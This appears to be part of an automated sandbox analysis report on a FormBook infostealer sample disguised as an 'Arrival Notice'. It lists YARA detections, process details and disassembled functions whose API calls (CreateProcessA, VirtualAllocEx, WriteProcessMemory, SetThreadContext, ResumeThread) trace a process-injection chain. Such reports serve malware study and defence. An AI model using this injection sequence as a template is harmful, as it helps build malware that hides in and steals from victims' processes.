                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:28
                                                                            Start time:16:41:19
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:11.8%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:196
                                                                              Total number of Limit Nodes:12
                                                                              execution_graph 22319 130acb0 22323 130ad97 22319->22323 22331 130ada8 22319->22331 22320 130acbf 22324 130adb9 22323->22324 22325 130addc 22323->22325 22324->22325 22339 130b030 22324->22339 22343 130b040 22324->22343 22325->22320 22326 130add4 22326->22325 22327 130afe0 GetModuleHandleW 22326->22327 22328 130b00d 22327->22328 22328->22320 22332 130adb9 22331->22332 22334 130addc 22331->22334 22332->22334 22337 130b030 LoadLibraryExW 22332->22337 22338 130b040 LoadLibraryExW 22332->22338 22333 130add4 22333->22334 22335 130afe0 GetModuleHandleW 22333->22335 22334->22320 22336 130b00d 22335->22336 22336->22320 22337->22333 22338->22333 22340 130b054 22339->22340 22342 130b079 22340->22342 22347 130a130 22340->22347 22342->22326 22344 130b054 22343->22344 22345 130a130 LoadLibraryExW 22344->22345 22346 130b079 22344->22346 22345->22346 22346->22326 22348 130b220 LoadLibraryExW 22347->22348 22350 130b299 22348->22350 22350->22342 22379 130d690 DuplicateHandle 22380 130d726 22379->22380 22381 130d040 22382 130d086 GetCurrentProcess 22381->22382 22384 130d0d1 22382->22384 22385 130d0d8 GetCurrentThread 22382->22385 22384->22385 22386 130d115 GetCurrentProcess 22385->22386 22387 130d10e 22385->22387 22388 130d14b 22386->22388 22387->22386 22389 130d173 GetCurrentThreadId 22388->22389 22390 130d1a4 22389->22390 22351 8229ae0 22352 8229c6b 22351->22352 22354 8229b06 22351->22354 22354->22352 22355 82296dc 22354->22355 22356 8229d60 PostMessageW 22355->22356 22357 8229dcc 22356->22357 22357->22354 22358 1304668 22359 130467a 22358->22359 22360 1304686 22359->22360 22362 1304778 22359->22362 22363 130479d 22362->22363 22367 1304878 22363->22367 22371 1304888 22363->22371 22369 13048af 22367->22369 22368 130498c 22369->22368 22375 13044b4 22369->22375 22373 13048af 22371->22373 22372 130498c 22372->22372 22373->22372 22374 13044b4 CreateActCtxA 22373->22374 22374->22372 22376 1305918 CreateActCtxA 22375->22376 22378 13059db 22376->22378 22391 822605b 22392 8226061 22391->22392 22397 8228566 22392->22397 22415 8228508 22392->22415 22432 82284f8 22392->22432 22393 8225fb9 22398 82284f4 22397->22398 22399 8228569 22397->22399 22403 8228546 22398->22403 22449 8229023 22398->22449 22455 822891d 22398->22455 22459 822913c 22398->22459 22465 8228bbb 22398->22465 22469 8228f3a 22398->22469 22474 8228e34 22398->22474 22479 8229330 22398->22479 22483 8229092 22398->22483 22488 8228c2d 22398->22488 22493 8228ece 22398->22493 22498 8228c08 22398->22498 22503 8228b4a 22398->22503 22508 82289a6 22398->22508 22513 8228ca1 22398->22513 22399->22393 22403->22393 22416 8228522 22415->22416 22417 8228546 22416->22417 22418 8229023 2 API calls 22416->22418 22419 8228ca1 4 API calls 22416->22419 22420 82289a6 2 API calls 22416->22420 22421 8228b4a 2 API calls 22416->22421 22422 8228c08 2 API calls 22416->22422 22423 8228ece 2 API calls 22416->22423 22424 8228c2d 2 API calls 22416->22424 22425 8229092 2 API calls 22416->22425 22426 8229330 2 API calls 22416->22426 22427 8228e34 2 API calls 22416->22427 22428 8228f3a 2 API calls 22416->22428 22429 8228bbb 2 API calls 22416->22429 22430 822913c 2 API calls 22416->22430 22431 822891d 2 API calls 22416->22431 22417->22393 22418->22417 22419->22417 22420->22417 22421->22417 22422->22417 22423->22417 22424->22417 22425->22417 22426->22417 22427->22417 22428->22417 22429->22417 22430->22417 22431->22417 22433 822850b 22432->22433 22434 8228546 22433->22434 22435 8229023 2 API calls 22433->22435 22436 8228ca1 4 API calls 22433->22436 22437 82289a6 2 API calls 22433->22437 22438 8228b4a 2 API calls 22433->22438 22439 8228c08 2 API calls 22433->22439 22440 8228ece 2 API calls 22433->22440 22441 8228c2d 2 API calls 22433->22441 22442 8229092 2 API calls 22433->22442 22443 8229330 2 API calls 22433->22443 22444 8228e34 2 API calls 22433->22444 22445 8228f3a 2 API calls 22433->22445 22446 8228bbb 2 API calls 22433->22446 22447 822913c 2 API calls 22433->22447 22448 822891d 2 API calls 22433->22448 22434->22393 22435->22434 22436->22434 22437->22434 22438->22434 22439->22434 22440->22434 22441->22434 22442->22434 22443->22434 22444->22434 22445->22434 22446->22434 22447->22434 22448->22434 22450 8229030 22449->22450 22451 8228e74 22449->22451 22452 8228a7c 22451->22452 22522 8225751 22451->22522 22526 8225758 22451->22526 22452->22403 22530 82258f0 22455->22530 22534 82258e5 22455->22534 22460 8228ef7 22459->22460 22461 8229163 22460->22461 22538 8225668 22460->22538 22542 8225660 22460->22542 22462 8228f1b 22467 8225660 WriteProcessMemory 22465->22467 22468 8225668 WriteProcessMemory 22465->22468 22466 822898e 22467->22466 22468->22466 22470 8228e74 22469->22470 22471 8228a7c 22470->22471 22472 8225751 ReadProcessMemory 22470->22472 22473 8225758 ReadProcessMemory 22470->22473 22471->22403 22472->22470 22473->22470 22475 8228e3d 22474->22475 22477 8225660 WriteProcessMemory 22475->22477 22478 8225668 WriteProcessMemory 22475->22478 22476 82291fa 22477->22476 22478->22476 22546 8225092 22479->22546 22550 8225098 22479->22550 22480 822934a 22484 8228c08 22483->22484 22485 8228a7c 22484->22485 22486 8225751 ReadProcessMemory 22484->22486 22487 8225758 ReadProcessMemory 22484->22487 22485->22403 22486->22484 22487->22484 22489 8228c33 22488->22489 22554 8224fe2 22489->22554 22558 8224fe8 22489->22558 22490 8228c60 22490->22403 22494 8228ef7 22493->22494 22496 8225660 WriteProcessMemory 22494->22496 22497 8225668 WriteProcessMemory 22494->22497 22495 8228f1b 22496->22495 22497->22495 22499 8228c0e 22498->22499 22500 8228a7c 22499->22500 22501 8225751 ReadProcessMemory 22499->22501 22502 8225758 ReadProcessMemory 22499->22502 22500->22403 22501->22499 22502->22499 22504 8228b50 22503->22504 22506 8224fe2 ResumeThread 22504->22506 22507 8224fe8 ResumeThread 22504->22507 22505 8228c60 22505->22403 22506->22505 22507->22505 22509 82289ab 22508->22509 22511 8225092 Wow64SetThreadContext 22509->22511 22512 8225098 Wow64SetThreadContext 22509->22512 22510 8229184 22511->22510 22512->22510 22514 8228ca7 22513->22514 22515 8228c4b 22514->22515 22516 8228cab 22514->22516 22518 8224fe2 ResumeThread 22515->22518 22519 8224fe8 ResumeThread 22515->22519 22562 82255a0 22516->22562 22566 82255a8 22516->22566 22517 822898e 22517->22403 22518->22517 22519->22517 22523 822575b ReadProcessMemory 22522->22523 22525 82257e7 22523->22525 22525->22451 22527 82257a3 ReadProcessMemory 22526->22527 22529 82257e7 22527->22529 22529->22451 22531 8225979 22530->22531 22531->22531 22532 8225ade CreateProcessA 22531->22532 22533 8225b3b 22532->22533 22535 82258f3 CreateProcessA 22534->22535 22537 8225b3b 22535->22537 22539 82256b0 WriteProcessMemory 22538->22539 22541 8225707 22539->22541 22541->22462 22543 82256b0 WriteProcessMemory 22542->22543 22545 8225707 22543->22545 22545->22462 22547 822509b Wow64SetThreadContext 22546->22547 22549 8225125 22547->22549 22549->22480 22551 82250dd Wow64SetThreadContext 22550->22551 22553 8225125 22551->22553 22553->22480 22555 8224fec ResumeThread 22554->22555 22557 8225059 22555->22557 22557->22490 22559 8225028 ResumeThread 22558->22559 22561 8225059 22559->22561 22561->22490 22563 82255ab VirtualAllocEx 22562->22563 22565 8225625 22563->22565 22565->22517 22567 82255e8 VirtualAllocEx 22566->22567 22569 8225625 22567->22569 22569->22517

                                                                              Executed Functions

                                                                              Function 08222148 Relevance: .1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 569a1257e6ce375b985e84c8fcf800a31153259fbb832a5e742d38cdc6d103a1
                                                                              • Instruction ID: 67e2114c47aa3e84e4fa9f2e39c6151afac4edc87490a2e08633092cff6302e8
                                                                              • Opcode Fuzzy Hash: 569a1257e6ce375b985e84c8fcf800a31153259fbb832a5e742d38cdc6d103a1
                                                                              • Instruction Fuzzy Hash: 9C512674E29229EBCF08CF9AD8409EDFBF6FB89301F149226E519B7211D7B25941CB50
                                                                              Function 08228B64 Relevance: .0, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e1c4cc5c92341c4e883acd42a48c656e99a96468018d43cac43f58ef9e0e8c60
                                                                              • Instruction ID: 4537a233a07c04f95d6b0b5a426a690fba6bfbee12cb3e6118bf17fdd8fa4b99
                                                                              • Opcode Fuzzy Hash: e1c4cc5c92341c4e883acd42a48c656e99a96468018d43cac43f58ef9e0e8c60
                                                                              • Instruction Fuzzy Hash: D5A00215CBF538F4E2181C2000005B4E63C331F807F507410C80A732421590C164851D
                                                                              Function 0130D030 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 294 130d030-130d0cf GetCurrentProcess 298 130d0d1-130d0d7 294->298 299 130d0d8-130d10c GetCurrentThread 294->299 298->299 300 130d115-130d149 GetCurrentProcess 299->300 301 130d10e-130d114 299->301 303 130d152-130d16d call 130d619 300->303 304 130d14b-130d151 300->304 301->300 306 130d173-130d1a2 GetCurrentThreadId 303->306 304->303 308 130d1a4-130d1aa 306->308 309 130d1ab-130d20d 306->309 308->309
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D0BE
                                                                              • GetCurrentThread.KERNEL32 ref: 0130D0FB
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D138
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0130D191
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: 677bf8eb173aa7d11f51f5ff81e9175427828788a37e833ffaa6a0a5265bfb5f
                                                                              • Instruction ID: 5aeb44f1808c1c36e338a385f3fed17b725d23e07ef6b941852e785716592efd
                                                                              • Opcode Fuzzy Hash: 677bf8eb173aa7d11f51f5ff81e9175427828788a37e833ffaa6a0a5265bfb5f
                                                                              • Instruction Fuzzy Hash: 1C5146B0A003498FDB19DFA9D648BDEBBF1BF48304F208459D419A73A1DB349885CF65
                                                                              Function 0130D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 316 130d040-130d0cf GetCurrentProcess 320 130d0d1-130d0d7 316->320 321 130d0d8-130d10c GetCurrentThread 316->321 320->321 322 130d115-130d149 GetCurrentProcess 321->322 323 130d10e-130d114 321->323 325 130d152-130d16d call 130d619 322->325 326 130d14b-130d151 322->326 323->322 328 130d173-130d1a2 GetCurrentThreadId 325->328 326->325 330 130d1a4-130d1aa 328->330 331 130d1ab-130d20d 328->331 330->331
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D0BE
                                                                              • GetCurrentThread.KERNEL32 ref: 0130D0FB
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D138
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0130D191
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: fb1e9bf1d76df34098c3177321df456c7216d4c86b2a7a542292c43bedbd5b7c
                                                                              • Instruction ID: bf622e3e9c4092592eb9682a03ed4c5269675eb28bfccba09d127ae4ae291ea4
                                                                              • Opcode Fuzzy Hash: fb1e9bf1d76df34098c3177321df456c7216d4c86b2a7a542292c43bedbd5b7c
                                                                              • Instruction Fuzzy Hash: CB5146B0A006098FDB18DFA9D548B9EFBF1BF48304F208459D419A73A0DB749884CF65
                                                                              Function 082258E5 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 360 82258e5-8225985 363 8225987-8225991 360->363 364 82259be-82259de 360->364 363->364 365 8225993-8225995 363->365 369 82259e0-82259ea 364->369 370 8225a17-8225a46 364->370 367 8225997-82259a1 365->367 368 82259b8-82259bb 365->368 371 82259a3 367->371 372 82259a5-82259b4 367->372 368->364 369->370 374 82259ec-82259ee 369->374 380 8225a48-8225a52 370->380 381 8225a7f-8225b39 CreateProcessA 370->381 371->372 372->372 373 82259b6 372->373 373->368 375 82259f0-82259fa 374->375 376 8225a11-8225a14 374->376 378 82259fe-8225a0d 375->378 379 82259fc 375->379 376->370 378->378 383 8225a0f 378->383 379->378 380->381 382 8225a54-8225a56 380->382 392 8225b42-8225bc8 381->392 393 8225b3b-8225b41 381->393 384 8225a58-8225a62 382->384 385 8225a79-8225a7c 382->385 383->376 387 8225a66-8225a75 384->387 388 8225a64 384->388 385->381 387->387 389 8225a77 387->389 388->387 389->385 403 8225bca-8225bce 392->403 404 8225bd8-8225bdc 392->404 393->392 403->404 405 8225bd0 403->405 406 8225bde-8225be2 404->406 407 8225bec-8225bf0 404->407 405->404 406->407 408 8225be4 406->408 409 8225bf2-8225bf6 407->409 410 8225c00-8225c04 407->410 408->407 409->410 411 8225bf8 409->411 412 8225c16-8225c1d 410->412 413 8225c06-8225c0c 410->413 411->410 414 8225c34 412->414 415 8225c1f-8225c2e 412->415 413->412 417 8225c35 414->417 415->414 417->417
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08225B26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 9a31814ca501921c26dccd71168d74ccd247b0af553ecd4011ac57a5bcae28e7
                                                                              • Instruction ID: 73c254e9a44990a26a05654ebca954d0d0e1bdcfeb0b5474b9550ac27efe365e
                                                                              • Opcode Fuzzy Hash: 9a31814ca501921c26dccd71168d74ccd247b0af553ecd4011ac57a5bcae28e7
                                                                              • Instruction Fuzzy Hash: 08A18C71D1022ADFDF60DF68C941BEDBBB2BF44315F1481A9E808A7290DB749985CF91
                                                                              Function 082258F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 418 82258f0-8225985 420 8225987-8225991 418->420 421 82259be-82259de 418->421 420->421 422 8225993-8225995 420->422 426 82259e0-82259ea 421->426 427 8225a17-8225a46 421->427 424 8225997-82259a1 422->424 425 82259b8-82259bb 422->425 428 82259a3 424->428 429 82259a5-82259b4 424->429 425->421 426->427 431 82259ec-82259ee 426->431 437 8225a48-8225a52 427->437 438 8225a7f-8225b39 CreateProcessA 427->438 428->429 429->429 430 82259b6 429->430 430->425 432 82259f0-82259fa 431->432 433 8225a11-8225a14 431->433 435 82259fe-8225a0d 432->435 436 82259fc 432->436 433->427 435->435 440 8225a0f 435->440 436->435 437->438 439 8225a54-8225a56 437->439 449 8225b42-8225bc8 438->449 450 8225b3b-8225b41 438->450 441 8225a58-8225a62 439->441 442 8225a79-8225a7c 439->442 440->433 444 8225a66-8225a75 441->444 445 8225a64 441->445 442->438 444->444 446 8225a77 444->446 445->444 446->442 460 8225bca-8225bce 449->460 461 8225bd8-8225bdc 449->461 450->449 460->461 462 8225bd0 460->462 463 8225bde-8225be2 461->463 464 8225bec-8225bf0 461->464 462->461 463->464 465 8225be4 463->465 466 8225bf2-8225bf6 464->466 467 8225c00-8225c04 464->467 465->464 466->467 468 8225bf8 466->468 469 8225c16-8225c1d 467->469 470 8225c06-8225c0c 467->470 468->467 471 8225c34 469->471 472 8225c1f-8225c2e 469->472 470->469 474 8225c35 471->474 472->471 474->474
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08225B26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 2958be532882f38512def329bf58f1964e59c9852de30112fc6e3536b49c087e
                                                                              • Instruction ID: f3c9539b6bd424d1e3e1ae6270a8e7ae6648cdf7fcd627c25294977767eea969
                                                                              • Opcode Fuzzy Hash: 2958be532882f38512def329bf58f1964e59c9852de30112fc6e3536b49c087e
                                                                              • Instruction Fuzzy Hash: 84917C71D1022ADFDF60DF68C941BEDBBB2BF48315F1481A9E808A7290DB749985CF91
                                                                              Function 0130ADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 475 130ada8-130adb7 476 130ade3-130ade7 475->476 477 130adb9-130adc6 call 130a0cc 475->477 479 130ade9-130adf3 476->479 480 130adfb-130ae3c 476->480 483 130adc8 477->483 484 130addc 477->484 479->480 486 130ae49-130ae57 480->486 487 130ae3e-130ae46 480->487 530 130adce call 130b030 483->530 531 130adce call 130b040 483->531 484->476 488 130ae59-130ae5e 486->488 489 130ae7b-130ae7d 486->489 487->486 491 130ae60-130ae67 call 130a0d8 488->491 492 130ae69 488->492 494 130ae80-130ae87 489->494 490 130add4-130add6 490->484 493 130af18-130afd8 490->493 496 130ae6b-130ae79 491->496 492->496 525 130afe0-130b00b GetModuleHandleW 493->525 526 130afda-130afdd 493->526 497 130ae94-130ae9b 494->497 498 130ae89-130ae91 494->498 496->494 501 130aea8-130aeaa call 130a0e8 497->501 502 130ae9d-130aea5 497->502 498->497 504 130aeaf-130aeb1 501->504 502->501 506 130aeb3-130aebb 504->506 507 130aebe-130aec3 504->507 506->507 508 130aee1-130aeee 507->508 509 130aec5-130aecc 507->509 516 130aef0-130af0e 508->516 517 130af11-130af17 508->517 509->508 511 130aece-130aede call 130a0f8 call 130a108 509->511 511->508 516->517 527 130b014-130b028 525->527 528 130b00d-130b013 525->528 526->525 528->527 530->490 531->490
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0130AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 94c015148ea4b0f5e1180832202f3613c88f30c1681aa414dd3dbb9ad352ab92
                                                                              • Instruction ID: 2c8d8bfd6064c5c42f465ca3d908850b47484b58ebb5eb26d7be584081730f43
                                                                              • Opcode Fuzzy Hash: 94c015148ea4b0f5e1180832202f3613c88f30c1681aa414dd3dbb9ad352ab92
                                                                              • Instruction Fuzzy Hash: EF812670A00B098FD725DF29D46479ABBF5FF88344F008A2DD48AD7A90D775E849CB90
                                                                              Function 0130590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 640 130590c-13059d9 CreateActCtxA 642 13059e2-1305a3c 640->642 643 13059db-13059e1 640->643 650 1305a4b-1305a4f 642->650 651 1305a3e-1305a41 642->651 643->642 652 1305a60 650->652 653 1305a51-1305a5d 650->653 651->650 655 1305a61 652->655 653->652 655->655
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 1afe0007377fe0ee4325864a9e05a5735465f56fea6f04a49d814d3e7ad73963
                                                                              • Instruction ID: 78399c6cc534d121681074fd537381ecebf412c894f411352686fcc18aa4047b
                                                                              • Opcode Fuzzy Hash: 1afe0007377fe0ee4325864a9e05a5735465f56fea6f04a49d814d3e7ad73963
                                                                              • Instruction Fuzzy Hash: 0141E2B0C0071DCEEB25CFA9C884ADEBBF5BF45318F24805AD409AB295DB755986CF50
                                                                              Function 013044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 656 13044b4-13059d9 CreateActCtxA 659 13059e2-1305a3c 656->659 660 13059db-13059e1 656->660 667 1305a4b-1305a4f 659->667 668 1305a3e-1305a41 659->668 660->659 669 1305a60 667->669 670 1305a51-1305a5d 667->670 668->667 672 1305a61 669->672 670->669 672->672
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 0a3dd8c2fd4d0fae551369855cef6459864c54e4acc6d2e8a518da95d6234abe
                                                                              • Instruction ID: cd33b82a772e0ab02f289cdd9521e167c3883bd33032903d299582db48e7dee2
                                                                              • Opcode Fuzzy Hash: 0a3dd8c2fd4d0fae551369855cef6459864c54e4acc6d2e8a518da95d6234abe
                                                                              • Instruction Fuzzy Hash: 0E41D3B0C0071DCBDB25DFA9C884B9EBBF5BF45304F248059D409AB295DB755986CF90
                                                                              Function 08225660 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 673 8225660-82256b6 675 82256c6-8225705 WriteProcessMemory 673->675 676 82256b8-82256c4 673->676 678 8225707-822570d 675->678 679 822570e-822573e 675->679 676->675 678->679
                                                                              APIs
                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 082256F8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 58d902c59c3501075d9dee83ed377619521f5b5c5920d8848825040de976d617
                                                                              • Instruction ID: f1aa949fd23042a709423d06c6ac639f7f98306ab917b83dfe442099e4bee4b0
                                                                              • Opcode Fuzzy Hash: 58d902c59c3501075d9dee83ed377619521f5b5c5920d8848825040de976d617
                                                                              • Instruction Fuzzy Hash: A82148B1900359DFCB10CFA9C9847EEBBF1FF48314F108429E959A7250C7789554CBA5
                                                                              Function 08225668 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 683 8225668-82256b6 685 82256c6-8225705 WriteProcessMemory 683->685 686 82256b8-82256c4 683->686 688 8225707-822570d 685->688 689 822570e-822573e 685->689 686->685 688->689
                                                                              APIs
                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 082256F8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 21baf5ef9f710f6ef1fa0093014042972077674aff29a78d3da92c4111722d33
                                                                              • Instruction ID: 71b62b7fa0ca2cbd8b2dd8d1090b4eac8ea448579d68a2b3b3c557a64227fb60
                                                                              • Opcode Fuzzy Hash: 21baf5ef9f710f6ef1fa0093014042972077674aff29a78d3da92c4111722d33
                                                                              • Instruction Fuzzy Hash: 7C2166B1900359DFCB10CFA9C984BEEBBF5FF48310F10842AE919A7250C778A944CBA4
                                                                              Function 08225751 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 693 8225751-82257e5 ReadProcessMemory 697 82257e7-82257ed 693->697 698 82257ee-822581e 693->698 697->698
                                                                              APIs
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 082257D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: a0923d4859e914501ffca0da5087c44fa509829cf5cfc804bd15848604f19d6f
                                                                              • Instruction ID: e7cdc60ff45f94c466b0a0b45683bc8d81037f53575e70b42e181b001f81b8ea
                                                                              • Opcode Fuzzy Hash: a0923d4859e914501ffca0da5087c44fa509829cf5cfc804bd15848604f19d6f
                                                                              • Instruction Fuzzy Hash: 2C2136B1801359DFCB10CFA9C984AEEFBF1FF48320F108529E568A7290C7389944CB61
                                                                              Function 08225092 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 702 8225092-82250e3 705 82250f3-8225123 Wow64SetThreadContext 702->705 706 82250e5-82250f1 702->706 708 8225125-822512b 705->708 709 822512c-822515c 705->709 706->705 708->709
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08225116
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: f752903aa98f70ad6c6ec7d438d1e855ec7f8261665227d774771d98973ca208
